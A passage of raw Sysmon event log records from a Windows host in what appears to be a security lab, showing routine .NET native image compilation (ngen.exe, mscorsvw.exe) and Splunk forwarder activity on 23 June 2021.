21:06:30.510{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A256-60D3-D304-00000000CF01}6984C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000022049Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:30.307{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A256-60D3-D204-00000000CF01}1324C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000022048Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:30.291{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4AA69A32C1B896192B52EC5168909AE5,SHA256=B05160E4AC42E3761DB3D12E6A60643D97E5E85D8EB8FBA53E6235D8B8351E6A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022047Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:30.275{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A256-60D3-D204-00000000CF01}1324C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022046Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:30.275{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A256-60D3-D204-00000000CF01}1324C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000022045Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:30.197{4DB9351A-A255-60D3-D104-00000000CF01}6628C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\19e4-0\System.Web.DataVisualization.Design.dll2021-06-23 21:06:30.197 10341000x800000000000000022061Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:31.978{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A257-60D3-D504-00000000CF01}6664C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022060Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:31.978{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A257-60D3-D504-00000000CF01}6664C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000022059Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:31.900{4DB9351A-A257-60D3-D404-00000000CF01}7008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1b60-0\System.Web.DynamicData.dll2021-06-23 21:06:31.900 10341000x800000000000000022058Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:31.557{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A257-60D3-D404-00000000CF01}7008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022057Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:31.541{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A257-60D3-D404-00000000CF01}7008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022056Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:31.541{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A257-60D3-D404-00000000CF01}7008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000022055Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:31.478{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9EDF4E1280515EBD5C70E4B2EC895FDC,SHA256=157A0A2D3186371BBAA89CED1F65DDE558B7C7437D36983DE9F3BEB27BC81944,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000022054Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:31.400{4DB9351A-A256-60D3-D304-00000000CF01}6984C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1b48-0\System.Web.Extensions.dll2021-06-23 21:06:31.400 10341000x800000000000000022085Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:32.949{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A258-60D3-DB04-00000000CF01}3420C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022084Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:32.932{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A258-60D3-DB04-00000000CF01}3420C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022083Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:32.932{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A258-60D3-DB04-00000000CF01}3420C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000022082Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:32.869{4DB9351A-A258-60D3-DA04-00000000CF01}6568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\19a8-0\System.Web.Entity.Design.dll2021-06-23 21:06:32.869 10341000x800000000000000022081Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:32.682{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A258-60D3-DA04-00000000CF01}6568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022080Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:32.666{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A258-60D3-DA04-00000000CF01}6568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022079Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:32.666{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A258-60D3-DA04-00000000CF01}6568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000022078Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:32.650{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7B3477B784EE08EF45ACB7286A835B8C,SHA256=924C6496312D9E7753D2E619716E1372BA54C5F9B8FA05A5EB9938702FDEA2F8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022077Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:32.588{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A258-60D3-D904-00000000CF01}4848C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022076Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:32.557{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A258-60D3-D904-00000000CF01}4848C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022075Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:32.557{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A258-60D3-D904-00000000CF01}4848C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000022074Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:32.530{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B19C076496988FBB4A1A7C498C687BD,SHA256=5C37B5651B0333064E766BC808E65B8FAF3EDCF3CAC536EA01B3AD08F130D107,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000022073Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:32.510{4DB9351A-A258-60D3-D804-00000000CF01}5916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\171c-0\System.Web.Entity.dll2021-06-23 21:06:32.510 10341000x800000000000000022072Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:32.322{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A258-60D3-D804-00000000CF01}5916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022071Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:32.307{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A258-60D3-D804-00000000CF01}5916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022070Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 